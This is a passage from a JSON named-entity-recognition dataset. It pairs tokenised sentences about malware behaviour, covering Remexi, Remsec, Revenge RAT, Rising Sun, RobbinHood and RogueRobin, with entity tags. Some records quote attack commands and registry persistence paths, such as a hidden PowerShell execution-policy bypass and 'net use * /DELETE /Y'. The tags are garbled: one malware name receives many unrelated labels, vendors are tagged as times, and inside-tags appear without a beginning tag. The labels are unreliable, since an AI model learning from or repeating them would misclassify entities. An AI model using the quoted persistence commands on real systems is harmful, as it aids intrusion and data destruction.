"to", "capture", "active", "windows", "on", "the", "machine", "and", "retrieve", "window", "titles." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Remexi", "encrypts", "and", "adds", "all", "gathered", "browser", "data", "into", "files", "for", "upload", "to", "C2." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "Remexi", "collects", "text", "from", "the", "clipboard." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Remexi", "decrypts", "the", "configuration", "data", "using", "XOR", "with", "25-character", "keys." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Remexi", "obfuscates", "its", "configuration", "data", "with", "XOR." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Remexi", "performs", "exfiltration", "over", "BITSAdmin,", "which", "is", "also", "used", "for", "the", "C2", "channel." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Remexi", "searches", "for", "files", "on", "the", "system." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Remexi", "gathers", "and", "exfiltrates", "keystrokes", "from", "the", "machine." ], "ner_tags": [ "B-Way", "B-Features", "O", "B-HackOrg", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "Remexi", "utilizes", "Run", "Registry", "keys", "in", "the", "HKLM", "hive", "as", "a", "persistence", "mechanism." ], "ner_tags": [ "B-Org", "O", "B-Tool", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Remexi", "utilizes", "scheduled", "tasks", "as", "a", "persistence", "mechanism." ], "ner_tags": [ "B-OffAct", "O", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Remexi", "takes", "screenshots", "of", "windows", "of", "interest." ], "ner_tags": [ "B-Way", "O", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Remexi", "uses", "AutoIt", "and", "VBS", "scripts", "throughout", "its", "execution", "process." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Remexi", "uses", "BITSAdmin", "to", "communicate", "with", "the", "C2", "server", "over", "HTTP." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Remexi", "silently", "executes", "received", "commands", "with", "cmd.exe." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Remexi", "executes", "received", "commands", "with", "wmic.exe", "(for", "WMI", "commands)." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Remexi", "achieves", "persistence", "using", "Userinit", "by", "adding", "the", "Registry", "key", "<code>HKLM\\Software\\Microsoft\\Windows", "NT\\CurrentVersion\\Winlogon\\Userinit</code>." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RemoteCMD", "copies", "a", "file", "over", "to", "the", "remote", "system", "before", "execution." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RemoteCMD", "can", "execute", "commands", "remotely", "by", "creating", "a", "new", "schedule", "task", "on", "the", "remote", "system" ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RemoteCMD", "can", "execute", "commands", "remotely", "by", "creating", "a", "new", "service", "on", "the", "remote", "system." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RemoteUtilities", "can", "enumerate", "files", "and", "directories", "on", "a", "target", "machine." ], "ner_tags": [ "B-Org", "O", "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RemoteUtilities", "can", "upload", "and", "download", "files", "to", "and", "from", "a", "target", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RemoteUtilities", "can", "use", "Msiexec", "to", "install", "a", "service." ], "ner_tags": [ "B-Time", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "RemoteUtilities", "can", "take", "screenshots", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Remsec", "is", "capable", "of", "using", "DNS", "for", "C2." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-HackOrg", "O", "O" ] }, { "tokens": [ "Remsec", "has", "a", "package", "that", "collects", "documents", "from", "any", "inserted", "USB", "sticks." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Remsec", "has", "a", "plugin", "to", "detect", "active", "drivers", "of", "some", "security", "products." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Remsec", "can", "add", "or", "remove", "applications", "or", "ports", "on", "the", "Windows", "firewall", "or", "disable", "it", "entirely." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "I-Features", "I-Features", "O", "B-Features", "O", "O", "O", "B-HackOrg", "O", "B-Features", "O", "O" ] }, { "tokens": [ "Remsec", "can", "perform", "DLL", "injection." ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Some", "data", "in", "Remsec", "is", "encrypted", "using", "RC5", "in", "CBC", "mode,", "AES-CBC", "with", "a", "hardcoded", "key,", "RC4,", "or", "Salsa20.", "Some", "data", "is", "also", "base64-encoded." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Remsec", "can", "exfiltrate", "data", "via", "a", "DNS", "tunnel", "or", "email,", "separately", "from", "its", "C2", "channel." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Tool", "I-Way", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Remsec", "contains", "a", "module", "to", "move", "data", "from", "airgapped", "networks", "to", "Internet-connected", "systems", "by", "using", "a", "removable", "USB", "device." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Tool" ] }, { "tokens": [ "Remsec", "has", "a", "plugin", "to", "drop", "and", "execute", "vulnerable", "Outpost", "Sandbox", "or", "avast!", "Virtualization", "drivers", "in", "order", "to", "gain", "kernel", "mode", "privileges." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O" ] }, { "tokens": [ "Remsec", "is", "capable", "of", "deleting", "files", "on", "the", "victim.", "It", "also", "securely", "removes", "itself", "after", "collecting", "and", "exfiltrating", "data." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "B-Features", "O", "B-HackOrg", "B-Features" ] }, { "tokens": [ "Remsec", "is", "capable", "of", "listing", "contents", "of", "folders", "on", "the", "victim.", "Remsec", "also", "searches", "for", "custom", "network", "encryption", "software", "on", "victims." ], "ner_tags": [ "B-Way", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Remsec", "contains", "a", "network", "loader", "to", "receive", "executable", "modules", "from", "remote", "attackers", "and", "run", "them", "on", "the", "local", "victim.", "It", "can", "also", "upload", "and", "download", "files", "over", "HTTP", "and", "HTTPS." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Remsec", "contains", "a", "keylogger", "component." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Remsec", "can", "obtain", "a", "list", "of", "users." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Remsec", "is", "capable", "of", "using", "SMTP", "for", "C2." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "The", "Remsec", "loader", "implements", "itself", "with", "the", "name", "Security", "Support", "Provider,", "a", "legitimate", "Windows", "function.", "Various", "Remsec", ".exe", "files", "mimic", "legitimate", "file", "names", "used", "by", "Microsoft,", "Symantec,", "Kaspersky,", "Hewlett-Packard,", "and", "VMWare.", "Remsec", "also", "disguised", "malicious", "modules", "using", "similar", "filenames", "as", "custom", "network", "encryption", "software", "on", "victims." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SecTeam", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "B-Org", "B-Time", "B-Time", "B-Org", "O", "B-Way", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Remsec", "has", "a", "plugin", "that", "can", "perform", "ARP", "scanning", "as", "well", "as", "port", "scanning." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-HackOrg", "B-Features", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "Remsec", "is", "capable", "of", "using", "ICMP,", "TCP,", "and", "UDP", "for", "C2." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Remsec", "harvests", "plain-text", "credentials", "as", "a", "password", "filter", "registered", "on", "domain", "controllers." ], "ner_tags": [ "B-Way", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Remsec", "can", "obtain", "a", "process", "list", "from", "the", "victim." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Remsec", "can", "ping", "or", "traceroute", "a", "remote", "host." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Remsec", "schedules", "the", "execution", "one", "of", "its", "modules", "by", "creating", "a", "new", "scheduler", "task." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Remsec", "can", "dump", "the", "SAM", "database." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Remsec", "has", "a", "plugin", "detect", "security", "products", "via", "active", "drivers." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "Remsec", "can", "obtain", "the", "OS", "version", "information,", "computer", "name,", "processor", "architecture,", "machine", "role,", "and", "OS", "edition." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Remsec", "can", "obtain", "information", "about", "network", "configuration,", "including", "the", "routing", "table,", "ARP", "cache,", "and", "DNS", "cache." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Remsec", "can", "obtain", "a", "list", "of", "active", "connections", "and", "open", "ports." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Remsec", "can", "obtain", "information", "about", "the", "current", "user." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Remsec", "is", "capable", "of", "using", "HTTP", "and", "HTTPS", "for", "C2." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Responder", "is", "used", "to", "poison", "name", "services", "to", "gather", "hashes", "and", "credentials", "from", "systems", "within", "a", "local", "network." ], "ner_tags": [ "B-Way", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "I-Features", "B-HackOrg", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Responder", "captures", "hashes", "and", "credentials", "that", "are", "sent", "to", "the", "system", "after", "the", "name", "services", "have", "been", "poisoned." ], "ner_tags": [ "B-Time", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Revenge", "RAT", "has", "a", "plugin", "for", "microphone", "interception." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "Revenge", "RAT", "used", "blogpost.com", "as", "its", "primary", "command", "and", "control", "server", "during", "a", "campaign." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-OffAct" ] }, { "tokens": [ "Revenge", "RAT", "uses", "the", "Forfiles", "utility", "to", "execute", "commands", "on", "the", "system." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Revenge", "RAT", "has", "the", "ability", "to", "upload", "and", "download", "files." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "B-Features", "O", "I-Features", "O" ] }, { "tokens": [ "Revenge", "RAT", "has", "a", "plugin", "for", "keylogging." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Revenge", "RAT", "uses", "mshta.exe", "to", "run", "malicious", "scripts", "on", "the", "system." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Revenge", "RAT", "has", "a", "plugin", "for", "credential", "harvesting." ], "ner_tags": [ "B-SamFile", "B-Tool", "O", "O", "O", "O", "B-Way", "B-Purp" ] }, { "tokens": [ "Revenge", "RAT", "uses", "the", "PowerShell", "command", "<code>Reflection.Assembly</code>", "to", "load", "itself", "into", "memory", "to", "aid", "in", "execution." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Revenge", "RAT", "has", "a", "plugin", "to", "perform", "RDP", "access." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Revenge", "RAT", "schedules", "tasks", "to", "run", "malicious", "scripts", "at", "different", "intervals." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Revenge", "RAT", "has", "a", "plugin", "for", "screen", "capture." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "Revenge", "RAT", "uses", "Base64", "to", "encode", "information", "sent", "to", "the", "C2", "server." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Revenge", "RAT", "collects", "the", "CPU", "information,", "OS", "information,", "and", "system", "language." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "I-Features", "I-Features", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Revenge", "RAT", "collects", "the", "IP", "address", "and", "MAC", "address", "from", "the", "system." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Revenge", "RAT", "gathers", "the", "username", "from", "the", "system." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Revenge", "RAT", "has", "the", "ability", "to", "access", "the", "webcam." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "Revenge", "RAT", "uses", "cmd.exe", "to", "execute", "commands", "and", "run", "scripts", "on", "the", "victim's", "machine." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Revenge", "RAT", "creates", "a", "Registry", "key", "at", "<code>HKCU\\Software\\Microsoft\\Windows", "NT\\CurrentVersion\\Winlogon\\Shell</code>", "to", "survive", "a", "system", "reboot." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rifdoor", "has", "added", "four", "additional", "bytes", "of", "data", "upon", "launching,", "then", "saved", "the", "changed", "version", "as", "<code>C:\\ProgramData\\Initech\\Initech.exe</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rifdoor", "has", "encrypted", "strings", "with", "a", "single", "byte", "XOR", "algorithm." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rifdoor", "has", "been", "executed", "from", "malicious", "Excel", "or", "Word", "documents", "containing", "macros." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "I-Way", "I-Way", "O", "O" ] }, { "tokens": [ "Rifdoor", "has", "created", "a", "new", "registry", "entry", "at", "<code>HKEY_CURRENT_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Graphics</code>", "with", "a", "value", "of", "<code>C:\\ProgramData\\Initech\\Initech.exe", "/run</code>." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rifdoor", "has", "been", "distributed", "in", "e-mails", "with", "malicious", "Excel", "or", "Word", "documents." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Rifdoor", "has", "encrypted", "command", "and", "control", "(C2)", "communications", "with", "a", "stream", "cipher." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Rifdoor", "has", "the", "ability", "to", "identify", "the", "Windows", "version", "on", "the", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rifdoor", "has", "the", "ability", "to", "identify", "the", "IP", "address", "of", "the", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Rifdoor", "has", "the", "ability", "to", "identify", "the", "username", "on", "the", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rising", "Sun", "can", "archive", "data", "using", "RC4", "encryption", "and", "Base64", "encoding", "prior", "to", "exfiltration." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rising", "Sun", "variants", "can", "use", "SSL", "for", "encrypting", "C2", "communications." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Rising", "Sun", "has", "collected", "data", "and", "files", "from", "a", "compromised", "host." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rising", "Sun", "has", "decrypted", "itself", "using", "a", "single-byte", "XOR", "scheme.", "Additionally,", "Rising", "Sun", "can", "decrypt", "its", "configuration", "data", "at", "runtime." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Configuration", "data", "used", "by", "Rising", "Sun", "has", "been", "encrypted", "using", "an", "RC4", "stream", "algorithm." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rising", "Sun", "can", "send", "data", "gathered", "from", "the", "infected", "machine", "via", "HTTP", "POST", "request", "to", "the", "C2." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rising", "Sun", "can", "delete", "files", "and", "artifacts", "it", "creates." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rising", "Sun", "can", "enumerate", "information", "about", "files", "from", "the", "infected", "system,", "including", "file", "size,", "attributes,", "creation", "time,", "last", "access", "time,", "and", "write", "time.", "Rising", "Sun", "can", "enumerate", "the", "compilation", "timestamp", "of", "Windows", "executable", "files." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rising", "Sun", "can", "modify", "file", "attributes", "to", "hide", "files." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rising", "Sun", "can", "clear", "a", "memory", "blog", "in", "the", "process", "by", "overwriting", "it", "with", "junk", "bytes." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Rising", "Sun", "can", "test", "a", "connection", "to", "a", "specified", "network", "IP", "address", "over", "a", "specified", "port", "number." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rising", "Sun", "used", "dynamic", "API", "resolutions", "to", "various", "Windows", "APIs", "by", "leveraging", "`LoadLibrary()`", "and", "`GetProcAddress()`." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Rising", "Sun", "can", "enumerate", "all", "running", "processes", "and", "process", "information", "on", "an", "infected", "machine." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rising", "Sun", "has", "identified", "the", "OS", "product", "name", "from", "a", "compromised", "host", "by", "searching", "the", "registry", "for", "`SOFTWARE\\MICROSOFT\\Windows", "NT\\", "CurrentVersion", "|", "ProductName`." ], "ner_tags": [ "I-SecTeam", "I-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Rising", "Sun", "can", "detect", "the", "computer", "name,", "operating", "system,", "and", "drive", "information,", "including", "drive", "type,", "total", "number", "of", "bytes", "on", "disk,", "total", "number", "of", "free", "bytes", "on", "disk,", "and", "name", "of", "a", "specified", "volume." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rising", "Sun", "can", "detect", "network", "adapter", "and", "IP", "address", "information." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rising", "Sun", "can", "detect", "the", "username", "of", "the", "infected", "host." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rising", "Sun", "has", "used", "HTTP", "and", "HTTPS", "for", "command", "and", "control." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Rising", "Sun", "has", "executed", "commands", "using", "`cmd.exe", "/c", "“<command>", ">", "<%temp%>\\AM<random>.", "tmp”", "2>&1`." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "RobbinHood", "will", "search", "for", "an", "RSA", "encryption", "key", "and", "then", "perform", "its", "encryption", "process", "on", "the", "system", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RobbinHood", "will", "search", "for", "Windows", "services", "that", "are", "associated", "with", "antivirus", "software", "on", "the", "system", "and", "kill", "the", "process." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RobbinHood", "deletes", "shadow", "copies", "to", "ensure", "that", "all", "the", "data", "cannot", "be", "restored", "easily." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RobbinHood", "disconnects", "all", "network", "shares", "from", "the", "computer", "with", "the", "command", "<code>net", "use", "*", "/DELETE", "/Y</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RobbinHood", "stops", "181", "Windows", "services", "on", "the", "system", "before", "beginning", "the", "encryption", "process." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RobbinHood", "uses", "cmd.exe", "on", "the", "victim's", "computer." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "RogueRobin", "has", "used", "Google", "Drive", "as", "a", "Command", "and", "Control", "channel." ], "ner_tags": [ "B-Idus", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "PowerShell", "script", "with", "the", "RogueRobin", "payload", "was", "obfuscated", "using", "the", "COMPRESS", "technique", "in", "`Invoke-Obfuscation`." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way" ] }, { "tokens": [ "RogueRobin", "decodes", "an", "embedded", "executable", "using", "base64", "and", "decompresses", "it." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RogueRobin", "can", "save", "a", "new", "file", "to", "the", "system", "from", "the", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RogueRobin", "uses", "a", "command", "prompt", "to", "run", "a", "PowerShell", "script", "from", "Excel.", "To", "assist", "in", "establishing", "persistence,", "RogueRobin", "creates", "<code>%APPDATA%\\OneDrive.bat</code>", "and", "saves", "the", "following", "string", "to", "it:<code>powershell.exe", "-WindowStyle", "Hidden", "-exec", "bypass", "-File", "“%APPDATA%\\OneDrive.ps1”</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RogueRobin", "checks", "the", "running", "processes", "for", "evidence", "it", "may", "be", "running", "in", "a", "sandbox", "environment.", "It", "specifically", "enumerates", "processes", "for", "Wireshark", "and", "Sysinternals." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "RogueRobin", "created", "a", "shortcut", "in", "the", "Windows", "startup", "folder", "to", "launch", "a", "PowerShell", "script", "each", "time", "the", "user", "logs", "in", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RogueRobin", "uses", "regsvr32.exe", "to", "run", "a", ".sct", "file", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", 